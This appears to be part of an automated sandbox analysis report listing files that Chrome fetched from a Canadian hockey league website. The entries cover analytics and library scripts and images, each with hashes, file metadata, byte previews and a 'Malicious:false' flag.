                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":9},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":11},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTO
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):327
                                                                                                                          Entropy (8bit):4.323569472988231
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:vUYj3Se6yBaG3dHW+nt2DGqX3vmAv4Ky8k8Qr:2lyBVPn1aeAq8kl
                                                                                                                          MD5:B527EB8DB37325C5A9B81EBAC8F1B8AD
                                                                                                                          SHA1:48E00EC552BF39E067E40C74C5DE10F7711FFDA8
                                                                                                                          SHA-256:0DDE6737DCFD63FECB42D36A804D2D771FE807082BC743E78A26A90569DC55CE
                                                                                                                          SHA-512:D3A576AC546DDF0EC8108EE6AB6D3CA1C1079A73A88A01786F1C5961B48D110B8F59DEE56C7938846754576A10BAAC585A67AA5CE537E1CF925ADB2A2AC177F9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=4.5.3
                                                                                                                          Preview:.icl_lang = icl_vars.current_language;.icl_home = icl_vars.icl_home;..function addLoadEvent(func) {. var oldonload = window.onload;. if (typeof window.onload != 'function') {. window.onload = func;. } else {. window.onload = function() {. if (oldonload) {. oldonload();. }. func();. }. } .}.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55635
                                                                                                                          Entropy (8bit):7.972871942956839
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:iLteGcPr2ObWVkuUf2/s8ZkJ6Ul0lyWtY:iLt3Er3ppf208ZARWl4
                                                                                                                          MD5:7AFC5F802A25B045E6029FED8EC78A9C
                                                                                                                          SHA1:4A565E8C0FF1A7AF5830B1D9D2E902AF82EEADFB
                                                                                                                          SHA-256:A3504C81E91D7356190D1205D5326AC053E3DF74C39EE807B86ACC3D726C2250
                                                                                                                          SHA-512:1452E13D07DA31181BA05D5E275EE88142D386505C48971BD5CDCB529E22334BD5D88D45B1D8801ABC607008EA5431905E1E2BD5C04FBA4812B4C8B18DA437F4
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................^.........................!..1..AQa."q..#2BR......$3br....CS..%F.......4Wcs....&5D..6EGTYd....................................F........................!1.A..Q"aq...2.....#B..Rb...r....$3C.4DEScs.............?.....b.~.$...t.V..a.Y.56.R+N..Q..H.G...@.....(B....=(.P. ...(qI.....(@...u..Y...$..Y.....f.;&...j].<|.%.~...T...G.>my.j-..cN....VBtT...T...\jz.i$...JI@..f.X.Q*T..{..c4b7.........SB\5....Z..SO..[..V:T..Nnm...E...?...R..."..'.Rx...%...b...D.v(....D.....P..(1G..."....../Q7.=.G...u6E..C|*kR........T.......w/.../S.Oh..}m..P.e..k.N*...>.H.[.g.....E..M..Z.e..'.[...&.;.{.,.,...z.......2...mo.u..kL..W#.NI8.I.....x.)y..+..+<3..u.'..:..`<=..e..6B.........l-.v...^..>E..I.Z....P..S.YJ....xs..'[.eR.hK....C....*j*6.j.y.I.IHSr.R}...U{Hpv.j.q_...G7..*.c.s!.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 320x320, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):37230
                                                                                                                          Entropy (8bit):7.983498172109513
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:VFGMgnFtDbmdCCgiKKxxaMOqDA+9wbqr6DRK0zIS:eMqPlitaMRAboi9f
                                                                                                                          MD5:424CF4D71D15D9541B3400E0F07A228B
                                                                                                                          SHA1:4E1EB5AF490CFEE7695C47D179D64EB06CAA2A81
                                                                                                                          SHA-256:A10D271DBD0DC6AE201C39EB15FA1200F9BCA58EC61C55E01116A45EA07C8D1B
                                                                                                                          SHA-512:DC03FF6E0F4A5D416EABEA72CCD88AD94F379FB662A0B0EAF6EE21029A9162187257A0B4B61D1D7256D3904293B7C83A075E4C6FC3C4BA9845BC249E5C36B78B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C.......................................................................@.@..".........................................L..........................!.1.AQ.."aq.2..#B.....Rr....$3b.4C..c...%St......................................M........................!1.A..Q...."aq...2R...#Bb.CSs......3cr...$&....................?.......Yjt..{.@.{Y.....M...K....J..A. .#.G...g.n....%..Y.......#...A.......~...~x........._..5%.tUt4.$1.........>.L..j7.-.5%<....W._n.{...A.u..R-3.=:.BN.."....@....0hZg..#M..v............8.^..y.....#.K.._b.-{X.#....:..-o.q[K.rTB#.4..k....,=...9..&Y.K!rYDql....<.5..u.yN.I.#......#....@.E..."..;.p.x..`....F..[.?#.r..kjL..1......o.|..&..s@U..S.c.ms...0j)Hr..MR$...AN..m...<w.T...uUU9.kT?.. LA...........&..W.L...............c=dsg.&l.R+9...H...>;..8"."(1R@....@.]GD.OD..'..n.?....Y|)..1......|.%,u.Iz:...>hV_..d.........9.e2I.9.i["x...\.. (..$..`0.6C...g...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 320x280, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):20946
                                                                                                                          Entropy (8bit):7.942152978394475
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:5buey5eRLAVg0GYUi2tVr7VGaUIyk6tQMukYFDRbde0kXMGOr1ICGwu/I2:57yULKg0GFtHGrrQMdY5pdnhrEH
                                                                                                                          MD5:5F5D41FB32402384828FD1A13EF1E79D
                                                                                                                          SHA1:5C8A22B1EF8F150E809A71C1202D2789B9013E80
                                                                                                                          SHA-256:B6C862D51A2D3883900DD34C68B5A03877E645C73A6F20E0C13D9E9986E4D50F
                                                                                                                          SHA-512:8714919B2B9B74ACBE7B05C8F44F3ACFA85468CF0FE977701C996E1643F4B39910CBE33B15909C65D7BBE6EEFFD2AF433959CDDFD0DA752B51A6423BF4634172
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/10/26123500/400X350-SAFE-SPORT-COMPLAINT-PROCESS-EN-320x280.jpg
                                                                                                                          Preview:......JFIF..............Exif..II*.................http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:88587f3c-b99f-4b42-91f3-05f6890f5c87" xmpMM:DocumentID="xmp.did:24325F90065211ED986E9E1E5945A856" xmpMM:InstanceID="xmp.iid:24325F8F065211ED986E9E1E5945A856" xmp:CreatorTool="Adobe Photoshop 23.4 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c3ace56e-f103-4079-858d-c81068b26287" stRef:documentID="adobe:docid:photoshop:6379f9c4-1acf-dc4a-a9bc-043aab7e6fb0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C.....................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (8091)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8170
                                                                                                                          Entropy (8bit):5.190502449771293
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Gw74GtZNg2K4Hhh7sgL3YKxNw9kcECKsCWk+Ox62OFhqrBogHsteZ6tr2rlS:cmfKK7RjYKKiWk+OxoFQrB1pZ69
                                                                                                                          MD5:993DE22BBCECA8FF77942767438C43E9
                                                                                                                          SHA1:110906C9008EE919993CE272D010D48DBF08C391
                                                                                                                          SHA-256:8788A6A30BF21825000421A23D09A6A37DF58FB2B0E3CE29198896986DCF51B4
                                                                                                                          SHA-512:8B035F296F005A251A1AC0FB24A1FF518B541E35A7E96E7747C57C914F09BD8E6F229523AE2DEB1C604CD66E4E1DA4E1F1C2B5DF49250382387BA447CB7DA258
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*! ReactMiniRouter 1.1.7 - https://github.com/larrymyers/react-mini-router */.var ReactMiniRouter=function(t){function e(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return t[r].call(o.exports,o,o.exports,e),o.loaded=!0,o.exports}var n={};return e.m=t,e.c=n,e.p="",e(0)}([function(t,e,n){t.exports={RouterMixin:n(2),navigate:n(4)}},function(t,e,n){var r=!("undefined"==typeof window||!window.document||!window.document.createElement);t.exports={canUseDOM:r,hasPushState:r&&window.history&&"pushState"in window.history,hasHashbang:function(){return r&&0===window.location.hash.indexOf("#!")},hasEventConstructor:function(){return"function"==typeof window.Event}}},function(t,e,n){function r(t){var e,n,r=t.props.path||t.context.path;return!r&&f.canUseDOM&&(n=p(window.location.href),t.props.history?r=n.pathname+n.search:n.hash&&(e=p(n.hash.slice(2)),r=e.pathname+e.search)),r||"/"}function o(t){if(!(t.defaultPrevented||t.metaKey||t.ctrlKey||t.shiftKey||0!==t.button)){for(v
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=11, manufacturer=Apple, model=iPhone SE (2nd generation), orientation=upper-left, xresolution=180, yresolution=188, resolutionunit=2, software=15.6.1, datetime=2022:11:13 14:45:31, hostcomputer=iPhone SE (2nd generation)], baseline, precision 8, 730x437, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):64973
                                                                                                                          Entropy (8bit):7.940331438094729
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:b0qOjUJyR+ti4telWL0IkUh6z2DX19D2KSeYVvSxkZ4:b0GyUteGkUkwjSKSeYW
                                                                                                                          MD5:7B82E84F2721A84E65723EF64DC19ABE
                                                                                                                          SHA1:D73987FE00605574A35EA1187521F405528C4207
                                                                                                                          SHA-256:68746EAFFBFB7BA49E8AF2A87C815B16C9FDB674AE1AC6BBF48B76300FA7CB5D
                                                                                                                          SHA-512:C59B7FA70856D737837443548903418756D8B8685BECE5853528983840FB2FDD992CA042DA1C82D5EC76A7CF2D9CB7C822CA925D72B0B535A068FBB1614D1310
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/11/17161524/IMG_9525-e1734465590754-730x437.jpg
                                                                                                                          Preview:......JFIF.....H.H......Exif..MM.*...................................................................(...........1...........2...........<.......................i..............Apple.iPhone SE (2nd generation).....H.......H....15.6.1..2022:11:13 14:45:31.iPhone SE (2nd generation)...%........................"...........'.......(..........0232.....................................................................................................................&...............................................6.|.........>........769.........769.........0100..............................................................................................<.........-...............2.........D.3.........d.4.....4...j.`.....................x........2022:11:13 14:45:31.2022:11:13 14:45:31.-05:00..-05:00..-05:00.............'..~E...o..$A...............d.......1Apple iOS...MM."...............................h...............................................................B...........Z...........K....
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=10, manufacturer=Apple, model=iPhone 14 Pro Max, orientation=upper-left, xresolution=158, yresolution=166, resolutionunit=2, software=Adobe Photoshop 24.0 (Macintosh), datetime=2024:07:17 14:01:13, GPS-Data], baseline, precision 8, 730x541, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):120264
                                                                                                                          Entropy (8bit):7.944302592525603
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:+mLqnbWy714mgkUMe3Lj2SS2yUK+70PiYsHBNa0g5UrHYurCIE7RRBRk:+lnSyQkQbj2SS2JrFYsvF14urCpPTk
                                                                                                                          MD5:222850DD1DCED31817C2E8B8E25C79DA
                                                                                                                          SHA1:CD053AE58884541DE1996EB40B0C5B28A463F6D6
                                                                                                                          SHA-256:8AE24E2835ADD51B3286B2370FC2718FC76DFDA8731202B1081C48B1792C2B1D
                                                                                                                          SHA-512:196945F29F36596037C177EAA0931C199200D8F06EAC9519AD53931897C96383D2C5B04DC3DD0CD3B1F3914DE897A48A1160742F43AC9C13966167F4BC6F74CD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....H.H....#.Exif..MM.*...................................................................(...........1.....!.....2..........i..........%.............LApple.iPhone 14 Pro Max....H.......H....Adobe Photoshop 24.0 (Macintosh).2024:07:17 14:01:13..........................."...........'..................0232.................................................................................................................................s...........................................................<...Y...2.. w..0...............J............W...2............N.......................W...........................................................K.......................T..............&........T..........................6...........B.......+.......2...........d...O...............h...d..B...............................%...U0..v.......v.....2024:07:08....{....R.........................................(................................ =.......H.......H..........Adobe_CM......Adobe.d.....
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (654)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):560258
                                                                                                                          Entropy (8bit):5.668859512958225
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:QStgGd8JmYx0sb6h8YfALjbBksK8ecdy7FdzZA96fcJ2fL2iJ5B7lXaqy2:Gn8hALjbispecknzXfIKhX7
                                                                                                                          MD5:19DDAC3BE88EDA2C8263C5D52FA7F6BD
                                                                                                                          SHA1:C81720778F57C56244C72CE6EF402BB4DE5F9619
                                                                                                                          SHA-256:B261530F05E272E18B5B5C86D860C4979C82B5B6C538E1643B3C94FC9BA76DD6
                                                                                                                          SHA-512:393015B8C7F14D5D4BDB9CCEED7CD1477A7DB07BC7C40BAE7D0A48A2ADFA7D56F9D1C3E4EC05C92FDE152E72FFA6B75D8BF724E1F63F9BC21421125667AFB05C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/releases/zIriijn3uj5Vpknvt_LnfNbF/recaptcha__en.js
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var X=function(){return[function(N,a,U,y,A,l,z){if((l=["toString",6,"constructor"],N&71)==N)if(typeof U==="string")z={buffer:Z[11](17,1,a,U),qH:!1};else if(Array.isArray(U))z={buffer:new Uint8Array(U),qH:!1};else if(U[l[2]]===Uint8Array)z={buffer:U,qH:!1};else if(U[l[2]]===ArrayBuffer)z={buffer:new Uint8Array(U),qH:!1};else if(U[l[2]]===WC)z={buffer:r[9](25,a,null,U)||new Uint8Array(0),qH:!0};else if(U instanceof Uint8Array)z={buffer:new Uint8Array(U.buffer,U.byteOffset,U.byteLength),qH:!1};else throw Error("Type not convertible to a Uint8Array, expected a Uint8Array, an ArrayBuffer, a base64 encoded string, a Byt
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1748)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3596
                                                                                                                          Entropy (8bit):5.444209745064718
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:YY7YNYR1m5ABePKTBxj6kDxx12yS1M9O84itGGyBoirdxM6j:t86+A4STflDp9B4YL8oi5xM6j
                                                                                                                          MD5:D92FD68178888768C733A4365A56FC3D
                                                                                                                          SHA1:55916ED75FD5C9DF0A7447298E2BCA559CC9583A
                                                                                                                          SHA-256:E573D7D4E3679F1D578E544C5B807AA4FF21E208BAF12E48AA0D09B2B3938F04
                                                                                                                          SHA-512:37CAEE932A7038636D84720960420E701C7659C873188CA400EE0196868D9C5A09BB31F566699ACF54DB0F0FC42BD769F1A141A213C2127C38CE839DACCA8BE5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://securepubads.g.doubleclick.net/pagead/js/car.js
                                                                                                                          Preview:/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var e=this||self;/* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ .var f={};function g(){if(f!==f)throw Error("Bad secret");};function h(a){return Object.isFrozen(a)&&Object.isFrozen(a.raw)}function k(a){return a.toString().indexOf("`")===-1}const l=k(a=>a``)||k(a=>a`\0`)||k(a=>a`\n`)||k(a=>a`\u0000`),m=h``&&h`\0`&&h`\n`&&h`\u0000`;let n=globalThis.trustedTypes,p;function q(){let a=null;if(!n)return a;try{const b=d=>d;a=n.createPolicy("goog#html",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){throw b;}return a};var r=class{constructor(a){g();this.g=a}toString(){return this.g+""}};function t(a){p===void 0&&(p=q());var b=p;return new r(b?b.createScriptURL(a):a)};var v=class{constructor(a){g();this.h=a}toString(){return this.h}};new v("about:blank");new v("about:invalid#zClosurez");const w=[];var x=a=>{console.warn(`A URL with content '${a}' was sanitized away.`)};w.ind
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 730 x 640, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):605320
                                                                                                                          Entropy (8bit):7.9956928548165305
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:zIroe/Wx1WvzhDB2UixTUbWCMHXf1C89HGrluX4J5pZx5Nsx:zIroe+x1WvrabXf1tLXk5pLsx
                                                                                                                          MD5:634EB1F5D73456C536AEB9CD8CB923D5
                                                                                                                          SHA1:E4F9160A9BFAD6D2E3F085CE7C8ECCB9F3D09DB5
                                                                                                                          SHA-256:C210CEC81E5030D1C83DB84250A23A84BBC216CA13F3614035344F807CE605D5
                                                                                                                          SHA-512:A90DF7F1B71E02275D093D690A1EA72EE28C2CEFFD66C83E301F9973EEC557D7A25A1B90FB23FF4738C92AF80FB5CA506460F43087F606622C214C7B681AE73C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/08/31160426/Screen-Shot-2023-08-31-at-4.03.51-PM-e1693512300199-730x640.png
                                                                                                                          Preview:.PNG........IHDR....................IDATx....$G..........{..D..D.Y..5..9....9<...uH....a..;;.r......#|_lS.y. ...jj... ..O...p7WS............ ".(J.%.b.eYb.!...=E1G.....cP....|I.....o...bP....#t.+|y..?+.."..c.h....p.*./.@..%...A5.......c.kU.K.oL..g.#...x..{Y./.w.TP..ZR.......x.T._...IZ..}..5!......%.. x.$.C.x_.k.<.....dM...Q.k,...>#......zD..B.O........x.....i.Y...w}..;....7.%.s....{?..-t.....e...nX...g'~.h.:Y...,^_.n......xz......|...^.y.:...........t.....w.K.....yTg.U~.y..............s..=.+]..".&.O5.z..../...}.u...3O.g.'h...?...&.....{%.2.<..GUq..,...o...#.F.W.o.kl..V?W]C.>D.#.1.cL..l..z....O.w.E.].+.}..;.c}/$.;.Y.....ay....y.^..".Pi....Pg.W..........D0..5.......H......k.|.J%.......4+%^t...>4.....S..&@...4......9.....wV?.x.U.6....D,9;.{A{.,..](...`.."*`L\7..!&.O....a]..t...".c....^#..:....TM..P...:....d.Y\..,.a.....v..I>d.7.]...<@.iF.......]`..I.. W..Wu.zi...@.+.....yv..^..DM.....z.H.G..j.{<&.rR.8.N.jy..g#/...S....qY.Q....oA$.k.........k.)...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1042159
                                                                                                                          Entropy (8bit):4.231895774513777
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:eoZwZSWw6WwPzZzWnfMw35nfMw3HGTKGTTwQIBnuq0:DZ6ZPNqfMw35fMw3HGTKGTTwQINu3
                                                                                                                          MD5:E025AE7BF313E81E694D8BBC66A9A5F0
                                                                                                                          SHA1:767FB761D73E4A5EA71F956B00B1448566C10D61
                                                                                                                          SHA-256:25B2E5F2ECA32F809C43647D70B02903C9BADB15E3E3C85A5651411B21C258E5
                                                                                                                          SHA-512:0D360321FDED449A1AC33FD337238C1E47DE1255594DFC3797819F1A0AF97AD6112D859C72463BC46254279884C5C1715B8628BB886CDE2C5890499C49A310FE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:{"b": {"d": {"a": false, "b": [{"a": 6, "d": [{"a": 2, "b": 30, "c": 4}, {"a": 7, "d": [{"a": 2, "b": 29, "c": 1}]}]}, {"a": 2, "b": 30, "c": 4}, {"a": 8}], "c": [{"b": true, "c": 1.32, "e": 0, "f": 0.0, "g": 1.0, "h": 1.0, "i": 1.0}, {"b": true, "d": 1.32, "e": 0, "f": 0.0, "g": 1.0, "h": 1.0, "i": 1.0}, {"b": false, "c": 1.0, "d": 1.0, "e": 0, "f": 0.0, "g": 0.0, "h": 0.0, "i": 0.0}]}, "g": {"e": {"c": {"d": "country_region_assignment", "a": false, "c": {"d": {"j": "US", "l": "US", "k": "VA_511"}}}}, "g": {"c": {"d": "YEU8xvohOXL", "e": {"b": true, "l": true, "w": true, "v": true}, "a": true, "b": [{"a": {"l": "US", "b": true, "v": 0, "w": true}, "d": {"h": 0.9288749219655741}}, {"a": {"l": "US", "b": true, "v": 1, "w": true}, "d": {"h": 0.9288749219655741}}, {"a": {"l": "US", "b": true, "v": 2, "w": true}, "d": {"h": 0.8137352721797373}}, {"a": {"l": "US", "b": true, "v": 3, "w": true}, "d": {"h": 0.8137352721797373}}, {"a": {"l": "US", "b": true, "v": 4, "w": true}, "d": {"h": 0.81
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):85085
                                                                                                                          Entropy (8bit):7.974936848702659
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:z7WRasfLUa2psRDDLh9JhBgBTZaxIBIe85mTGN7FZUgZFi+73u6L7TBmBw95l:z7WAQARatvh1BgBTZmIB18kTGZJp7+Q5
                                                                                                                          MD5:327091DA5210694A7B476201AAAE830F
                                                                                                                          SHA1:6C0F3021498C41B0EFDC8EE0298D115FD7C01246
                                                                                                                          SHA-256:55C2ADD5C16A50FCD6EA5E63C9F74F49842E2E9BFE00FDEBFA555CD6E99B3114
                                                                                                                          SHA-512:A94B8BBEAC5BED4E9DC3C3576269F2B8F799280CCB7D07F69011619903D8FA20A2E4309974E3265C2FAF31793BC771AE5995015906561B7A52AD60EF611B9A33
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/06164616/AROUND-THE-G-TITLE-November-2024-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................._..........................!.1.AQa.."q2..#BR....3b...$r..C..%&4Sc.....5T'DEd.....6FVefstuv....................................A........................!1.."AQa.2q...#....3B....R..r..4Ccs................?.....y0.......P...-..C..`.U..J..e.G..5.5....XC....+4.xO...~Y.T..aq.@H.V.. ]..m.4.nRgt.Xh..M.H..8...(..D...)# .n...b<T..q{.....q..A..jE8.w%.%_...M.i}.0...........9*@.4.g.m.BT.....m..o.G-.\.$.............N..nnJ....k.D.. ...!?.:.3.+..Y2.z^,.n..$%G.........(...\.p....v.s...K.j...&.S.........U3..K.;TJ....`{.e._...V.1Q^1\?J.T..../.2..zP.P.....2.$75.!.7.Zp...........c...^..*o.i...\V..!^..=EdR_T...O.H...m..$.}..eV.../F'i.O.....99iqj).d`T..l..!/...;.B.V.*.c.V=.U.k.).q.zJ.....m...2....<.6]l.....8..y}V.R.YZ.U.I?.n..36......LI...&+.....vy..H.MCj6...k...jK.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 6217
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2705
                                                                                                                          Entropy (8bit):7.915735546000415
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Xez4p83xGJUxhNTHCfaRyRYI4hCBKr9QgH7BsCxMyhS33ha:YZGwhNToaRHIul9QgH7Be30
                                                                                                                          MD5:2DD0D317A9C22DA28252DCEC3F2C18FE
                                                                                                                          SHA1:795C64173C4912FB5AC3C90B40DB086CD01E341C
                                                                                                                          SHA-256:FABC284B7AE03CE9179D8791E064C2C73F2868D65ADB76DE767528F9B5DCC11F
                                                                                                                          SHA-512:CF42553588C6E5BB87B483DA0D7C6350429FD0AA1E83BA91A3107FA230A1B72B0275FF0129E49C1452971A22AAF26DBB4E0E243FD311058B746478C559C3E9F3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://rum-static.pingdom.net/prum.min.js
                                                                                                                          Preview:...........Xms.6..~.B...Y....iK.....UwN....f|..M.l4...@%>Y...._m)ss3.#...<...U.r'...]PY.Ygd.YK.....v.\e...........E.:.a.5T.65..`...V.T.......^o."...G.>..?.Tap.D....+...)..Iw.Ys.;=.XDu.....^..y.b..a..M).g......|....R....*.... ......4..%....eJ.:).@.....%..].*...H*.2...o3G....u.....p...........X...b..^WV..q".....o...[..R....VkX...z.......RP....&.....R.KR..n.~.fj<.yZ.U.\.&.QdS..fT.+..H&.Z9.*...a.#...l|.......7d.}H......6..v.....\k..Wg......fTt...,q.g$.0.........Fd......k.Ui..p2e..0g.s.n'.D......m...@....+b..-;............H.MORxLe[y.9m.l..%[S.n@.."7...)...Z.....X..D.C.<{.._......Y4+..,........X.'. T......vn..].E|.T.5.T......*....d.Z..bK....4.._..%..S..ye.aGq.s..87...(....r}. TL...B;X:....7..$.F.....W...{...i.V.x.8.C..+.9..:.`..V...#J.;dS.F.O.lr2..d.h.H...2.#...t..0.v...G8...{.......... ...H.{ah..t .s........Jr4"0>....D.^........m...e+Y...Su....tz.gn.Xh...?.>..l......2.)....&.G"@.@..v.emL+g....L9..S.c9.f....9.d....l.!..h...t..Py.E..8)..Z.U..\/.sU$
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):58245
                                                                                                                          Entropy (8bit):7.976723136113466
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:JILw7ngG4DEtxy0gTFOLjqbEj9PYambrSF2rkJtVUBboOTdzt:8SRmEaOqCYa64cboOTBt
                                                                                                                          MD5:E1E5E3BA30B15EFF39C28D582FF542F0
                                                                                                                          SHA1:0E788F47999344C2B72007C928A12348FF7AE43D
                                                                                                                          SHA-256:1049972A117ECA446960DD8EC303EC61B89C0C8608909326B111E55F44F70EFA
                                                                                                                          SHA-512:4475DC5E6CDF1DDB5E4F0195ADA83FBC6FBB569FEFD28381C3089B7D3BC38B7ED56AAB3E545662EA99CE57EE1C6BF35857D3A82A90CC55322F764560B1E1CA05
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
